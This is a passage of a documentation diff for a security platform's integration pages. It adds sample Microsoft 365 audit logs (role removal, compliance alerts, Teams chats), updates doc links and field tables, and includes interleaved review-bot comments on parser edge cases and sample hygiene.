phish\",\"sev\":\"Low\",\"ail\":\"https://security.microsoft.com/mtp-investigation/urn:SubmissionInvestigation:260a29b9cf8a4358857b82aa9f086c48\"}", + "Name": "Email reported by user as malware or phish", + "PolicyId": "5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52", + "Severity": "Low", + "Source": "Office 365 Security & Compliance", + "Status": "Resolved" + } + ``` + + + === "exchange_event1" 
@@ -1230,6 +1432,110 @@ In this section, you will find examples of raw logs as generated natively by the +=== "remove_member_from_role" + + + ```json + { + "CreationTime": "2024-07-10T14:31:24", + "Id": "d1253377-388e-4ca1-a163-32dccb867ddd", + "Operation": "Remove member from role.", + "OrganizationId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55", + "RecordType": 8, + "ResultStatus": "Success", + "UserKey": "key@example.com", + "UserType": 0, + "Version": 1, + "Workload": "AzureActiveDirectory", + "ObjectId": "john.doe@example.com", + "UserId": "admin@example.com", + "AzureActiveDirectoryEventType": 1, + "ExtendedProperties": [ + { + "Name": "additionalDetails", + "Value": "{}" + }, + { + "Name": "extendedAuditEventCategory", + "Value": "Role" + } + ], + "ModifiedProperties": [ + { + "Name": "Role.ObjectID", + "NewValue": "", + "OldValue": "62d603c4-9712-4ea9-83c6-1e253fad40a4" + }, + { + "Name": "Role.DisplayName", + "NewValue": "", + "OldValue": "Global Administrator" + }, + { + "Name": "Role.TemplateId", + "NewValue": "", + "OldValue": "2eb5763a-6258-4084-90d6-8f149a03132d" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "", + "OldValue": "TenantAdmins" + } + ], + "Actor": [ + { + "ID": "admin@example.com", + "Type": 5 + }, + { + "ID": "100320029D963D0D", + "Type": 3 + }, + { + "ID": "User_47498f0f-242d-4ec8-8c13-9c861ce5669f", + "Type": 2 + }, + { + "ID": "47498f0f-242d-4ec8-8c13-9c861ce5669f", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "ActorContextId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55", + "InterSystemsId": "3da056e9-e6dc-4157-b991-8304c3b95eb7", + "IntraSystemId": "e7bf6e46-a61f-417a-a11d-282756b8262f", + "SupportTicketId": "", + "Target": [ + { + "ID": "User_1514c9ec-882d-4beb-99a9-301209f6a05a", + "Type": 2 + }, + { + "ID": "1514c9ec-882d-4beb-99a9-301209f6a05a", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "john.doe@example.com", + "Type": 5 + }, + { + "ID": "100320029D9D1C86", + "Type": 3 + } + ], + 
"TargetContextId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55" + } + ``` + + + === "security_compliance_alert" @@ -1384,6 +1690,41 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_compliance_alert_5" + + + ```json + { + "CreationTime": "2024-04-16T08:01:42", + "Id": "d7cab54f-77b1-4ad5-8f2d-b4bba61e4e93", + "Operation": "AlertEntityGenerated", + "OrganizationId": "e0ff0845-9d15-4399-86ae-15081e39a16a", + "RecordType": 40, + "ResultStatus": "Succeeded", + "UserKey": "SecurityComplianceAlerts", + "UserType": 4, + "Version": 1, + "Workload": "SecurityComplianceCenter", + "ObjectId": "jdoe@example.org", + "UserId": "SecurityComplianceAlerts", + "AlertEntityId": "jdoe@example.org", + "AlertId": "a3ce0859-c92c-4f57-b50b-a63dad75ec4a", + "AlertLinks": [], + "AlertType": "System", + "Category": "ThreatManagement", + "Comments": "New alert", + "Data": "", + "EntityType": "User", + "Name": "Email reported by user as malware or phish", + "PolicyId": "88d533c5-bad6-4cfb-9245-1776726b55d7", + "Severity": "Low", + "Source": "Office 365 Security & Compliance", + "Status": "Investigating" + } + ``` + + + === "source_log" 
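Review bot: the `remove_member_from_role` sample reports `"ResultStatus": "Success"` (workload `AzureActiveDirectory`) whereas the SecurityComplianceCenter samples in the same file use `"Succeeded"`; make sure the parser's outcome mapping accepts both spellings, because a rule built on the removal of `Global Administrator` (`Role.DisplayName` OldValue, `Role.WellKnownObjectName` `TenantAdmins`) would silently miss events whose outcome failed to normalise. Also, this diff adds only the raw sample and no transformed counterpart, so which fields the actor (`admin@example.com`) and target (`john.doe@example.com`) end up in for a role removal is not documented anywhere visible here.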
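Review bot: `security_compliance_alert_5` is the one sample with `"Data": ""` and `"Status": "Investigating"`, so it exercises the path where the nested JSON `Data` payload is absent; confirm the parser treats the empty string as "no data" rather than failing the JSON decode and dropping the event, and that `AlertEntityId` / `EntityType` (`User`) still populate the target user in that case. A one-line remark under the tab saying the sample exists for the empty-`Data` case would stop someone "fixing" it later.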
@@ -1501,6 +1842,361 @@ In this section, you will find examples of raw logs as generated natively by the +=== "teams_with_foreign_tenant_users" + + + ```json + { + "AppAccessContext": { + "IssuedAtTime": "2024-06-10T06:51:28", + "UniqueTokenId": "mYyWp_-UrEa4Z_pZM7FlAA" + }, + "CreationTime": "2024-06-10T11:50:24", + "Id": "4e3612b5-9cf5-4c6d-8213-2ba12af15334", + "Operation": "ChatCreated", + "OrganizationId": "a84a7a26-d1f0-4d45-a875-481355e2d96c", + "RecordType": 25, + "UserKey": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b", + "UserId": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "ChatThreadId": "19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Paris" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "10" + }, + { + "Key": "Country", + "Value": "fr" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "27/1.0.0.2024052206" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "6d869a66-371f-4b76-a1f6-3c115469a99d", + "DisplayName": "John Doe", + "UPN": "john.doe@example.org" + }, + { + "OrganizationId": "6db03b45-27a2-4662-9121-fa5773a8e043", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example.org", + "example.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example.org", + "TenantId": "6d869a66-371f-4b76-a1f6-3c115469a99d" + }, + { + "DomainName": "example.com", + "TenantId": "6db03b45-27a2-4662-9121-fa5773a8e043" + } + ], + 
"ParticipatingTenantIds": [ + "6d869a66-371f-4b76-a1f6-3c115469a99d", + "6db03b45-27a2-4662-9121-fa5773a8e043" + ] + }, + "ResourceTenantId": "6db03b45-27a2-4662-9121-fa5773a8e043", + "ItemName": "19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces" + } + ``` + + + +=== "teams_with_foreign_tenant_users_2" + + + ```json + { + "CreationTime": "2024-07-12T08:27:46", + "Id": "5964f7bd-8775-4dbe-84a8-37573510558c", + "Operation": "ChatCreated", + "OrganizationId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "RecordType": 25, + "UserKey": "413e1939-c450-4d63-8226-b02a542e6a9a", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "1.2.3.4", + "UserId": "john.doe@example1.com", + "ChatThreadId": "19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Berlin" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "de" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24061318408" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "DisplayName": "John Doe", + "UPN": "john.doe@example1.com" + }, + { + "OrganizationId": "f35fe983-e797-44ce-bd0b-cf4da93a8043", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example2.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example1.com", + "example2.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example1.com", + "TenantId": "456bd527-0a31-47c3-b369-0c04b30849ac" + }, + { + "DomainName": "example2.com", + "TenantId": 
"f35fe983-e797-44ce-bd0b-cf4da93a8043" + } + ], + "ParticipatingTenantIds": [ + "f35fe983-e797-44ce-bd0b-cf4da93a8043", + "456bd527-0a31-47c3-b369-0c04b30849ac" + ] + }, + "ResourceTenantId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "ItemName": "19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces" + } + ``` + + + +=== "teams_with_foreign_tenant_users_3" + + + ```json + { + "CreationTime": "2024-07-12T08:27:37", + "Id": "db1cd437-5417-4cd3-ae6b-19a980f9bcfc", + "Operation": "ChatCreated", + "OrganizationId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "RecordType": 25, + "UserKey": "4daf1829-8823-454f-b4e0-1cd22342d5f3", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "1.2.3.4", + "UserId": "john.doe@example1.com", + "ChatThreadId": "19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Berlin" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "de" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24061318408" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "DisplayName": "John Doe", + "UPN": "john.doe@example1.com" + }, + { + "OrganizationId": "1d36ca61-5509-4ac7-983d-91dfdeb5f492", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example2.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example1.com", + "example2.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example1.com", + "TenantId": "41847cb3-0096-48f2-82d0-c4f1bf92e031" + }, + { + "DomainName": 
"example2.com", + "TenantId": "1d36ca61-5509-4ac7-983d-91dfdeb5f492" + } + ], + "ParticipatingTenantIds": [ + "1d36ca61-5509-4ac7-983d-91dfdeb5f492", + "41847cb3-0096-48f2-82d0-c4f1bf92e031" + ] + }, + "ResourceTenantId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "ItemName": "19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces" + } + ``` + + + +=== "teams_without_foreign_tenant_users" + + + ```json + { + "CreationTime": "2024-06-10T12:14:57", + "Id": "f47118c3-edcf-43a9-b505-c7c904231ac2", + "Operation": "ChatCreated", + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "RecordType": 25, + "UserKey": "70de41a7-73c7-4532-8257-25ec88456e99", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "194.169.176.18", + "UserId": "jdoe_example.org#EXT#@example.onmicrosoft.com", + "ChatThreadId": "19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Paris" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "fr" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24051622207" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "DisplayName": "John Doe", + "UPN": "jdoe_example.org#EXT#@example.onmicrosoft.com" + }, + { + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example.org" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": false, + "HasGuestUsers": true, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [], + "ParticipatingSIPDomains": [], + "ParticipatingTenantIds": [ + 
"e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1" + ] + }, + "ResourceTenantId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "ItemName": "19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces" + } + ``` + + + === "threat_intel" diff --git a/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md b/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md index 1eb631f2ac..259e992662 100644 --- a/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md +++ b/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "searchlight_alerts.json" 
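Review bot: `teams_without_foreign_tenant_users` uses `"ClientIP": "194.169.176.18"`, a routable public address, while the other Teams samples use `1.2.3.4` or a random IPv6; swap it for a documentation-range address (RFC 5737, e.g. `203.0.113.10`) so the sample cannot be mistaken for a real observation. Two smaller points on the same hunk: that sample is really the guest-user case (`HasGuestUsers: true`, `#EXT#` UPN, empty `ParticipatingDomains`), so the tab name undersells what it demonstrates; and `teams_with_foreign_tenant_users_2` and `_3` differ only in GUIDs and a few seconds of `CreationTime`, so one of them could go unless the intent is to show that the order of `ParticipatingTenantIds` differs between samples (home tenant listed first in sample 1, foreign tenant first in 2 and 3), which is a useful property for a parser not to depend on.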
diff --git a/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md b/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md index 02baed629e..9f8100d9fb 100644 --- a/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md +++ b/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "allowed.json" diff --git a/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md b/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md index 4ea04662df..683b354e86 100644 --- a/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md 
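Review bot: the `/docs/xdr/...` to `/xdr/...` link rewrite in the "Transformed Events Samples after Ingestion" paragraph is repeated verbatim in every generated integration page in this diff; since these files live under `_shared_content/operations_center/integrations/generated/`, the generator template that emits that paragraph needs the same change or the next regeneration will reintroduce the `/docs/` prefix. The three root-relative targets (`/xdr/features/detect/rules_catalog`, `/xdr/features/investigate/events`, `/xdr/features/detect/sigma`) should also be checked against the site's base path rather than assumed to resolve.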
+++ b/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_detection.json" @@ -67,7 +67,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ubika": { "cloud_protector": { - "application_id": "www.some-app.com" + "application_id": "www.some-app.com", + "attack_family": "Information Disclosure" } }, "url": { 
@@ -98,6 +99,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.id` | `keyword` | Rule ID | |`source.ip` | `ip` | IP address of the source. | |`ubika.cloud_protector.application_id` | `keyword` | Website server name | +|`ubika.cloud_protector.attack_family` | `keyword` | The nature of the attack | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.query` | `keyword` | Query string of the request. | diff --git a/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md b/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md index d064224140..9d527c3cea 100644 --- a/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md +++ b/_shared_content/operations_center/integrations/generated/d14567dd-56b1-42f8-aa64-fb65d4b0a4cf.md 
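Review bot: the new `ubika.cloud_protector.attack_family` row describes the field as `The nature of the attack`, which is vaguer and styled differently from the neighbouring rows (no trailing period, no example); suggest `Attack family reported by Cloud Protector, e.g. "Information Disclosure".`, reusing the value from the updated `test_detection.json` sample, so analysts know the field holds a category rather than free text.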
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_network.json" diff --git a/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md b/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md index 45a5650225..ff22e5d06a 100644 --- a/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md +++ b/_shared_content/operations_center/integrations/generated/d2725f97-0c7b-4942-a847-983f38efb8ff.md 
@@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "salesforce_apex_execution.json" diff --git a/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md b/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md index 53ea781113..d191dedcbd 100644 --- a/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md +++ b/_shared_content/operations_center/integrations/generated/d3a813ac-f9b5-451c-a602-a5994544d9ed.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "7602ff70-7e5f-42e9-86b2-36803df39183.json" @@ -889,7 +889,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "response_elements": "{\"ConsoleLogin\": \"Success\"}" }, "user_identity": { - "accessKeyId": "", "accountId": "1111111111", "arn": "arn:aws:iam::1111111111:root", "principalId": "1111111111", 
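Review bot: dropping `"accessKeyId": ""` from `user_identity` in the `7602ff70-...json` sample changes what a rule author sees for a root `ConsoleLogin` event: the key is now absent instead of empty. If the parser change behind this removes empty-string values in general, say so in the integration changelog, because existing rules or searches that test for the field's presence (or match on an empty value) will behave differently after deployment.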
@@ -1260,6 +1259,9 @@ The following table lists the fields that are extracted, normalized under the EC |`aws.cloudtrail.flattened.request_parameters` | `keyword` | The flattened version of the field requestParameters | |`aws.cloudtrail.flattened.response_elements` | `keyword` | The flattened version of the field responseElements | |`aws.cloudtrail.response_elements.pendingModifiedValues.masterUserPassword` | `keyword` | The new master password for the RDS instance | +|`aws.cloudtrail.response_elements.policy.arn` | `keyword` | provides information about the queried policy arn | +|`aws.cloudtrail.response_elements.policy.policyId` | `keyword` | provides information about the queried policyId | +|`aws.cloudtrail.response_elements.policy.policyName` | `keyword` | provides information about the queried policyName | |`aws.cloudtrail.response_elements.user.userName` | `keyword` | The name of the user in the response | |`cloud.account.id` | `keyword` | The cloud account or organization id. | |`cloud.instance.id` | `keyword` | Instance ID of the host machine. | diff --git a/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md b/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md index 21c6af27d4..2908dbc0b2 100644 --- a/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md +++ b/_shared_content/operations_center/integrations/generated/d626fec3-473a-44b3-9e3d-587fdd99a421.md 
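Review bot: the three new `aws.cloudtrail.response_elements.policy.*` descriptions start lowercase and repeat "provides information about the queried ...", unlike the surrounding rows; suggest `The ARN of the policy returned in the response.`, `The ID of the policy returned in the response.` and `The name of the policy returned in the response.`. These are the fields a rule on policy creation or attachment would key on, so a transformed sample showing them populated would help, and none appears in this diff.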
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "elff_event.json" diff --git a/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md b/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md index 0003ce5829..0a980e80a2 100644 --- a/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md +++ b/_shared_content/operations_center/integrations/generated/d6d15297-e977-4584-9bb3-f0290b99f014.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_fail.json" diff --git a/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md b/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md index 85642d7b50..d358cfa6aa 100644 --- a/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md +++ b/_shared_content/operations_center/integrations/generated/d6f69e04-6ab7-40c0-9723-84060aeb5529.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "admin_services_service_modify.json" diff --git a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md index 7e4bc74bdc..dd358d27bc 100644 --- a/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md +++ b/_shared_content/operations_center/integrations/generated/d719e8b5-85a1-4dad-bf71-46155af56570.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth_was_rejected.json" 
